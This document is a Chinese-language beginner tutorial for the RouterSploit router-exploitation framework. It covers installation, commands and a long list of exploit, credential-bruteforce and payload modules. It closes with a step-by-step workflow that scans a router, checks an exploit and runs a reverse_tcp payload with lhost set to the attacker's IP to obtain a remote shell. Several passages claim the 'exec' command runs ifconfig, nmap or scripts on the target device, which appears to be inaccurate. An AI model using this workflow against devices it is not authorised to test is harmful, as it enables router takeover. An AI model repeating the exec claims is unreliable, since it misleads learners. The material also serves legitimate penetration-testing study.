路由器漏洞測試工具routersploit入門
routerSploit是一款專門針對路由器和嵌入式設備的漏洞測試工具,它提供了一套用于掃描、發現和利用路由器和嵌入式設備漏洞的功能。該工具使用Python編寫,并集成了大量針對路由器和相關設備的漏洞利用模塊,用戶可以利用這些模塊來進行滲透測試和安全評估。RouterSploit支持通過簡單的命令行界面進行操作,并提供了豐富的功能,包括掃描、漏洞利用、暴力破解等,使用戶能夠快速、有效地評估目標設備的安全性。
RouterSploit的主要功能包括:
- 掃描功能:能夠對目標路由器或嵌入式設備進行端口掃描、服務識別和漏洞掃描,幫助用戶快速了解設備的安全狀況。
- 漏洞利用:集成了大量針對路由器和嵌入式設備的漏洞利用模塊,用戶可以利用這些模塊對已知的漏洞進行利用,以驗證設備的安全性或進行滲透測試。
- 暴力破解功能:支持對路由器和相關設備的認證憑據進行暴力破解,幫助評估設備的認證機制是否安全。
- 模塊化框架:具有模塊化的設計結構,用戶可以輕松添加新的漏洞利用模塊或擴展現有功能,以適應不斷變化的安全需求。
一.kali安裝
1.1安裝RouterSploit
默認情況下RouterSploit沒有安裝,在終端中輸入routersploit命令后,系統自動提示安裝,輸入"Y"然后輸入kali賬號的密碼即可自動進行安裝。
也可以克隆安裝:
git clone https://github.com/reverse-shell/routersploit
圖片
后面執行顯示出錯還需要安裝一些需要的依賴包
pip install pycryptodome
1.2啟動RouterSploit
在終端中輸入routersploit即可開啟RouterSploit框架。
圖片
二.RouterSploit主要命令
2.1基本命令
1.help命令
顯示幫助信息
圖片
set:設置模塊的參數,例如set RHOST 192.168.1.1設置目標主機。
2.show命令
info:顯示模塊的基本信息和描述。
options:顯示模塊的可配置選項和參數。
advanced:顯示模塊的高級選項和參數。
devices:顯示已知設備的信息。
all:顯示所有可用的模塊。
encoders:顯示可用的編碼器。
creds:顯示已經捕獲的憑證。
exploits:顯示可用的漏洞利用模塊。
scanners:顯示可用的掃描模塊。
wordlists:顯示可用的字典文件。
圖片
show all顯示所有的
generic/upnp/ssdp_msearch
generic/bluetooth/btle_write
generic/bluetooth/btle_scan
generic/bluetooth/btle_enumerate
payloads/x86/reverse_tcp
payloads/x86/bind_tcp
payloads/perl/reverse_tcp
payloads/perl/bind_tcp
payloads/armle/reverse_tcp
payloads/armle/bind_tcp
payloads/php/reverse_tcp
payloads/php/bind_tcp
payloads/mipsle/reverse_tcp
payloads/mipsle/bind_tcp
payloads/mipsbe/reverse_tcp
payloads/mipsbe/bind_tcp
payloads/x64/reverse_tcp
payloads/x64/bind_tcp
payloads/cmd/netcat_reverse_tcp
payloads/cmd/perl_reverse_tcp
payloads/cmd/perl_bind_tcp
payloads/cmd/awk_bind_udp
payloads/cmd/awk_bind_tcp
payloads/cmd/python_reverse_udp
payloads/cmd/netcat_bind_tcp
payloads/cmd/php_bind_tcp
payloads/cmd/python_bind_udp
payloads/cmd/python_bind_tcp
payloads/cmd/python_reverse_tcp
payloads/cmd/awk_reverse_tcp
payloads/cmd/php_reverse_tcp
payloads/cmd/bash_reverse_tcp
payloads/python/reverse_udp
payloads/python/bind_udp
payloads/python/reverse_tcp
payloads/python/bind_tcp
scanners/autopwn
scanners/routers/router_scan
scanners/misc/misc_scan
scanners/cameras/camera_scan
encoders/php/hex
encoders/php/base64
encoders/python/hex
encoders/python/base64
creds/routers/netsys/telnet_default_creds
creds/routers/netsys/ftp_default_creds
creds/routers/netsys/ssh_default_creds
creds/routers/netcore/telnet_default_creds
creds/routers/netcore/ftp_default_creds
creds/routers/netcore/ssh_default_creds
creds/routers/ipfire/telnet_default_creds
creds/routers/ipfire/ftp_default_creds
creds/routers/ipfire/ssh_default_creds
creds/routers/technicolor/telnet_default_creds
creds/routers/technicolor/ftp_default_creds
creds/routers/technicolor/ssh_default_creds
creds/routers/3com/telnet_default_creds
creds/routers/3com/ftp_default_creds
creds/routers/3com/ssh_default_creds
creds/routers/2wire/telnet_default_creds
creds/routers/2wire/ftp_default_creds
creds/routers/2wire/ssh_default_creds
creds/routers/thomson/telnet_default_creds
creds/routers/thomson/ftp_default_creds
creds/routers/thomson/ssh_default_creds
creds/routers/huawei/telnet_default_creds
creds/routers/huawei/ftp_default_creds
creds/routers/huawei/ssh_default_creds
creds/routers/zte/telnet_default_creds
creds/routers/zte/ftp_default_creds
creds/routers/zte/ssh_default_creds
creds/routers/fortinet/telnet_default_creds
creds/routers/fortinet/ftp_default_creds
creds/routers/fortinet/ssh_default_creds
creds/routers/juniper/telnet_default_creds
creds/routers/juniper/ftp_default_creds
creds/routers/juniper/ssh_default_creds
creds/routers/pfsense/webinterface_http_form_default_creds
creds/routers/pfsense/ssh_default_creds
creds/routers/zyxel/telnet_default_creds
creds/routers/zyxel/ftp_default_creds
creds/routers/zyxel/ssh_default_creds
creds/routers/cisco/telnet_default_creds
creds/routers/cisco/ftp_default_creds
creds/routers/cisco/ssh_default_creds
creds/routers/ubiquiti/telnet_default_creds
creds/routers/ubiquiti/ftp_default_creds
creds/routers/ubiquiti/ssh_default_creds
creds/routers/asus/telnet_default_creds
creds/routers/asus/ftp_default_creds
creds/routers/asus/ssh_default_creds
creds/routers/movistar/telnet_default_creds
creds/routers/movistar/ftp_default_creds
creds/routers/movistar/ssh_default_creds
creds/routers/asmax/telnet_default_creds
creds/routers/asmax/ftp_default_creds
creds/routers/asmax/webinterface_http_auth_default_creds
creds/routers/asmax/ssh_default_creds
creds/routers/bhu/telnet_default_creds
creds/routers/bhu/ftp_default_creds
creds/routers/bhu/ssh_default_creds
creds/routers/belkin/telnet_default_creds
creds/routers/belkin/ftp_default_creds
creds/routers/belkin/ssh_default_creds
creds/routers/dlink/telnet_default_creds
creds/routers/dlink/ftp_default_creds
creds/routers/dlink/ssh_default_creds
creds/routers/comtrend/telnet_default_creds
creds/routers/comtrend/ftp_default_creds
creds/routers/comtrend/ssh_default_creds
creds/routers/tplink/telnet_default_creds
creds/routers/tplink/ftp_default_creds
creds/routers/tplink/ssh_default_creds
creds/routers/billion/telnet_default_creds
creds/routers/billion/ftp_default_creds
creds/routers/billion/ssh_default_creds
creds/routers/netgear/telnet_default_creds
creds/routers/netgear/ftp_default_creds
creds/routers/netgear/ssh_default_creds
creds/routers/mikrotik/telnet_default_creds
creds/routers/mikrotik/api_ros_default_creds
creds/routers/mikrotik/ftp_default_creds
creds/routers/mikrotik/ssh_default_creds
creds/routers/linksys/telnet_default_creds
creds/routers/linksys/ftp_default_creds
creds/routers/linksys/ssh_default_creds
creds/generic/snmp_bruteforce
creds/generic/ftp_default
creds/generic/telnet_default
creds/generic/http_basic_digest_default
creds/generic/ssh_bruteforce
creds/generic/ssh_default
creds/generic/http_basic_digest_bruteforce
creds/generic/telnet_bruteforce
creds/generic/ftp_bruteforce
creds/cameras/iqinvision/telnet_default_creds
creds/cameras/iqinvision/ftp_default_creds
creds/cameras/iqinvision/ssh_default_creds
creds/cameras/axis/telnet_default_creds
creds/cameras/axis/ftp_default_creds
creds/cameras/axis/webinterface_http_auth_default_creds
creds/cameras/axis/ssh_default_creds
creds/cameras/samsung/telnet_default_creds
creds/cameras/samsung/ftp_default_creds
creds/cameras/samsung/ssh_default_creds
creds/cameras/vacron/telnet_default_creds
creds/cameras/vacron/ftp_default_creds
creds/cameras/vacron/ssh_default_creds
creds/cameras/basler/telnet_default_creds
creds/cameras/basler/webinterface_http_form_default_creds
creds/cameras/basler/ftp_default_creds
creds/cameras/basler/ssh_default_creds
creds/cameras/siemens/telnet_default_creds
creds/cameras/siemens/ftp_default_creds
creds/cameras/siemens/ssh_default_creds
creds/cameras/arecont/telnet_default_creds
creds/cameras/arecont/ftp_default_creds
creds/cameras/arecont/ssh_default_creds
creds/cameras/avtech/telnet_default_creds
creds/cameras/avtech/ftp_default_creds
creds/cameras/avtech/ssh_default_creds
creds/cameras/hikvision/telnet_default_creds
creds/cameras/hikvision/ftp_default_creds
creds/cameras/hikvision/ssh_default_creds
creds/cameras/geovision/telnet_default_creds
creds/cameras/geovision/ftp_default_creds
creds/cameras/geovision/ssh_default_creds
creds/cameras/cisco/telnet_default_creds
creds/cameras/cisco/ftp_default_creds
creds/cameras/cisco/ssh_default_creds
creds/cameras/stardot/telnet_default_creds
creds/cameras/stardot/ftp_default_creds
creds/cameras/stardot/ssh_default_creds
creds/cameras/speco/telnet_default_creds
creds/cameras/speco/ftp_default_creds
creds/cameras/speco/ssh_default_creds
creds/cameras/brickcom/telnet_default_creds
creds/cameras/brickcom/ftp_default_creds
creds/cameras/brickcom/webinterface_http_auth_default_creds
creds/cameras/brickcom/ssh_default_creds
creds/cameras/mobotix/telnet_default_creds
creds/cameras/mobotix/ftp_default_creds
creds/cameras/mobotix/ssh_default_creds
creds/cameras/acti/telnet_default_creds
creds/cameras/acti/webinterface_http_form_default_creds
creds/cameras/acti/ftp_default_creds
creds/cameras/acti/ssh_default_creds
creds/cameras/videoiq/telnet_default_creds
creds/cameras/videoiq/ftp_default_creds
creds/cameras/videoiq/ssh_default_creds
creds/cameras/dlink/telnet_default_creds
creds/cameras/dlink/ftp_default_creds
creds/cameras/dlink/ssh_default_creds
creds/cameras/jvc/telnet_default_creds
creds/cameras/jvc/ftp_default_creds
creds/cameras/jvc/ssh_default_creds
creds/cameras/avigilon/telnet_default_creds
creds/cameras/avigilon/ftp_default_creds
creds/cameras/avigilon/ssh_default_creds
creds/cameras/canon/telnet_default_creds
creds/cameras/canon/ftp_default_creds
creds/cameras/canon/webinterface_http_auth_default_creds
creds/cameras/canon/ssh_default_creds
creds/cameras/grandstream/telnet_default_creds
creds/cameras/grandstream/ftp_default_creds
creds/cameras/grandstream/ssh_default_creds
creds/cameras/sentry360/telnet_default_creds
creds/cameras/sentry360/ftp_default_creds
creds/cameras/sentry360/ssh_default_creds
creds/cameras/american_dynamics/telnet_default_creds
creds/cameras/american_dynamics/ftp_default_creds
creds/cameras/american_dynamics/ssh_default_creds
creds/cameras/honeywell/telnet_default_creds
creds/cameras/honeywell/ftp_default_creds
creds/cameras/honeywell/ssh_default_creds
exploits/routers/netsys/multi_rce
exploits/routers/netcore/udp_53413_rce
exploits/routers/ipfire/ipfire_proxy_rce
exploits/routers/ipfire/ipfire_oinkcode_rce
exploits/routers/ipfire/ipfire_shellshock
exploits/routers/technicolor/tc7200_password_disclosure_v2
exploits/routers/technicolor/tc7200_password_disclosure
exploits/routers/technicolor/tg784_authbypass
exploits/routers/technicolor/dwg855_authbypass
exploits/routers/multi/misfortune_cookie
exploits/routers/multi/rom0
exploits/routers/multi/tcp_32764_rce
exploits/routers/multi/tcp_32764_info_disclosure
exploits/routers/multi/gpon_home_gateway_rce
exploits/routers/3com/officeconnect_rce
exploits/routers/3com/ap8760_password_disclosure
exploits/routers/3com/imc_path_traversal
exploits/routers/3com/officeconnect_info_disclosure
exploits/routers/3com/imc_info_disclosure
exploits/routers/2wire/gateway_auth_bypass
exploits/routers/2wire/4011g_5012nv_path_traversal
exploits/routers/thomson/twg849_info_disclosure
exploits/routers/thomson/twg850_password_disclosure
exploits/routers/huawei/e5331_mifi_info_disclosure
exploits/routers/huawei/hg530_hg520b_password_disclosure
exploits/routers/huawei/hg866_password_change
exploits/routers/huawei/hg520_info_disclosure
exploits/routers/zte/f460_f660_backdoor
exploits/routers/zte/zxv10_rce
exploits/routers/zte/zxhn_h108n_wifi_password_disclosure
exploits/routers/fortinet/fortigate_os_backdoor
exploits/routers/zyxel/zywall_usg_extract_hashes
exploits/routers/zyxel/p660hn_t_v2_rce
exploits/routers/zyxel/d1000_rce
exploits/routers/zyxel/p660hn_t_v1_rce
exploits/routers/zyxel/d1000_wifi_password_disclosure
exploits/routers/cisco/ucm_info_disclosure
exploits/routers/cisco/firepower_management60_path_traversal
exploits/routers/cisco/ucs_manager_rce
exploits/routers/cisco/secure_acs_bypass
exploits/routers/cisco/dpc2420_info_disclosure
exploits/routers/cisco/unified_multi_path_traversal
exploits/routers/cisco/ios_http_authorization_bypass
exploits/routers/cisco/firepower_management60_rce
exploits/routers/cisco/catalyst_2960_rocem
exploits/routers/ubiquiti/airos_6_x
exploits/routers/asus/asuswrt_lan_rce
exploits/routers/asus/rt_n16_password_disclosure
exploits/routers/asus/infosvr_backdoor_rce
exploits/routers/movistar/adsl_router_bhs_rta_path_traversal
exploits/routers/asmax/ar_804_gu_rce
exploits/routers/asmax/ar_1004g_password_disclosure
exploits/routers/bhu/bhu_urouter_rce
exploits/routers/belkin/n150_path_traversal
exploits/routers/belkin/g_plus_info_disclosure
exploits/routers/belkin/g_n150_password_disclosure
exploits/routers/belkin/play_max_prce
exploits/routers/belkin/auth_bypass
exploits/routers/belkin/n750_rce
exploits/routers/dlink/multi_hedwig_cgi_exec
exploits/routers/dlink/dir_645_password_disclosure
exploits/routers/dlink/dwl_3200ap_password_disclosure
exploits/routers/dlink/dsl_2740r_dns_change
exploits/routers/dlink/dir_300_645_815_upnp_rce
exploits/routers/dlink/dcs_930l_auth_rce
exploits/routers/dlink/dsl_2730b_2780b_526b_dns_change
exploits/routers/dlink/dsl_2750b_rce
exploits/routers/dlink/multi_hnap_rce
exploits/routers/dlink/dwr_932_info_disclosure
exploits/routers/dlink/dvg_n5402sp_path_traversal
exploits/routers/dlink/dir_8xx_password_disclosure
exploits/routers/dlink/dwr_932b_backdoor
exploits/routers/dlink/dir_645_815_rce
exploits/routers/dlink/dsl_2640b_dns_change
exploits/routers/dlink/dsp_w110_rce
exploits/routers/dlink/dir_815_850l_rce
exploits/routers/dlink/dir_300_600_rce
exploits/routers/dlink/dir_300_320_600_615_info_disclosure
exploits/routers/dlink/dgs_1510_add_user
exploits/routers/dlink/dsl_2750b_info_disclosure
exploits/routers/dlink/dir_850l_creds_disclosure
exploits/routers/dlink/dir_825_path_traversal
exploits/routers/dlink/dir_300_320_615_auth_bypass
exploits/routers/dlink/dns_320l_327l_rce
exploits/routers/dlink/dsl_2730_2750_path_traversal
exploits/routers/comtrend/ct_5361t_password_disclosure
exploits/routers/tplink/wdr842nd_wdr842n_configure_disclosure
exploits/routers/tplink/wdr740nd_wdr740n_path_traversal
exploits/routers/tplink/wdr740nd_wdr740n_backdoor
exploits/routers/tplink/archer_c2_c20i_rce
exploits/routers/billion/billion_7700nr4_password_disclosure
exploits/routers/billion/billion_5200w_rce
exploits/routers/shuttle/915wm_dns_change
exploits/routers/netgear/jnr1010_path_traversal
exploits/routers/netgear/dgn2200_ping_cgi_rce
exploits/routers/netgear/multi_rce
exploits/routers/netgear/prosafe_rce
exploits/routers/netgear/dgn2200_dnslookup_cgi_rce
exploits/routers/netgear/r7000_r6400_rce
exploits/routers/netgear/multi_password_disclosure-2017-5521
exploits/routers/netgear/wnr500_612v3_jnr1010_2010_path_traversal
exploits/routers/netgear/n300_auth_bypass
exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
exploits/routers/mikrotik/routeros_jailbreak
exploits/routers/linksys/wrt100_110_rce
exploits/routers/linksys/smartwifi_password_disclosure
exploits/routers/linksys/eseries_themoon_rce
exploits/routers/linksys/1500_2500_rce
exploits/routers/linksys/wap54gv3_rce
exploits/generic/ssh_auth_keys
exploits/generic/heartbleed
exploits/generic/shellshock
exploits/misc/asus/b1m_projector_rce
exploits/misc/wepresent/wipg1000_rce
exploits/misc/miele/pg8528_path_traversal
exploits/cameras/multi/jvc_vanderbilt_honeywell_path_traversal
exploits/cameras/multi/netwave_ip_camera_information_disclosure
exploits/cameras/multi/dvr_creds_disclosure
exploits/cameras/multi/P2P_wificam_credential_disclosure
exploits/cameras/multi/P2P_wificam_rce
exploits/cameras/siemens/cvms2025_credentials_disclosure
exploits/cameras/cisco/video_surv_path_traversal
exploits/cameras/jovision/jovision_credentials_disclosure
exploits/cameras/brickcom/users_cgi_creds_disclosure
exploits/cameras/brickcom/corp_network_cameras_conf_disclosure
exploits/cameras/mvpower/dvr_jaws_rce
exploits/cameras/dlink/dcs_930l_932l_auth_bypass
exploits/cameras/avigilon/videoiq_camera_path_traversal
exploits/cameras/xiongmai/uc_httpd_path_traversal
exploits/cameras/grandstream/gxv3611hd_ip_camera_sqli
exploits/cameras/grandstream/gxv3611hd_ip_camera_backdoor
exploits/cameras/honeywell/hicc_1100pt_password_disclosure
3.run
執行當前模塊來利用目標設備。
4.use命令
use :選擇要使用的模塊,例如漏洞利用模塊、掃描模塊等。例如use scanners/autopwn
5.執行指定的命令
exec :在shell中執行指定的命令,可以用于執行系統命令等。
在RouterSploit中,exec命令可以用于執行特定的系統命令。您可以使用exec命令來執行各種操作系統命令和工具,包括但不限于以下內容:
(1)執行系統命令
exec run ifconfig
這個例子會在目標設備上執行ifconfig命令,顯示網絡接口的配置信息。
(2)執行其他工具:
exec run nmap -sP 192.168.0.1/24
這個例子會在目標設備上執行nmap掃描命令,對指定網段進行主機存活性檢測。
(3)執行自定義腳本
exec run /path/to/custom_script.sh arg1 arg2
這個例子會在目標設備上執行自定義的Shell腳本,并傳入參數arg1和arg2。
6.search 搜索命令
search :搜索符合特定關鍵詞的模塊。
7.退出和返回
exit:退出RouterSploit工具。
back:返回上一級菜單。
2.2掃描結果中符號
RouterSploit掃描過程及結果中會有三個符號[+]、[-]、[*],特定的含義如下:
[+] 表示存在漏洞:掃描結果表明目標系統存在一個或多個已知的安全漏洞。
[-] 表示漏洞不存在:掃描結果表明目標系統未發現任何已知的安全漏洞。
[*] 表示無法確定:掃描結果表明無法確定目標系統是否存在已知的安全漏洞,可能由于掃描條件不足或存在其他未知因素。
三.RouterSploit利用流程
3.1RouterSploit掃描路由器漏洞
1.確認路由器地址
tracert www.sina.com.cn
第一個結果就是本地路由器地址。
3.2.掃描路由器
use scanners/autopwn
show options
set RHOST 192.168.1.1
run
3.3.對漏洞進行檢查
use exploits/routers/3com/officeconnect_rce
set target 192.168.31.1
check
3.4.漏洞利用
1.配置playload
可以使用的playload列表(show all命令獲取),網上很多文章通過show playloads命令來獲取,kali環境執行未發現,有可能是python版本有。
payloads/x86/reverse_tcp
payloads/x86/bind_tcp
payloads/perl/reverse_tcp
payloads/perl/bind_tcp
payloads/armle/reverse_tcp
payloads/armle/bind_tcp
payloads/php/reverse_tcp
payloads/php/bind_tcp
payloads/mipsle/reverse_tcp
payloads/mipsle/bind_tcp
payloads/mipsbe/reverse_tcp
payloads/mipsbe/bind_tcp
payloads/x64/reverse_tcp
payloads/x64/bind_tcp
payloads/cmd/netcat_reverse_tcp
payloads/cmd/perl_reverse_tcp
payloads/cmd/perl_bind_tcp
payloads/cmd/awk_bind_udp
payloads/cmd/awk_bind_tcp
payloads/cmd/python_reverse_udp
payloads/cmd/netcat_bind_tcp
payloads/cmd/php_bind_tcp
payloads/cmd/python_bind_udp
payloads/cmd/python_bind_tcp
payloads/cmd/python_reverse_tcp
payloads/cmd/awk_reverse_tcp
payloads/cmd/php_reverse_tcp
payloads/cmd/bash_reverse_tcp
payloads/python/reverse_udp
payloads/python/bind_udp
payloads/python/reverse_tcp
payloads/python/bind_tcp
(1)選擇對應的payload
use payloads/x64/reverse_tcp
(2)查看配置
show options
(3)設置payload
set lhost [你的ip]
(4)再次查看配置
show options
(5)開始攻擊
run
如果存在可利用的漏洞則反彈shell
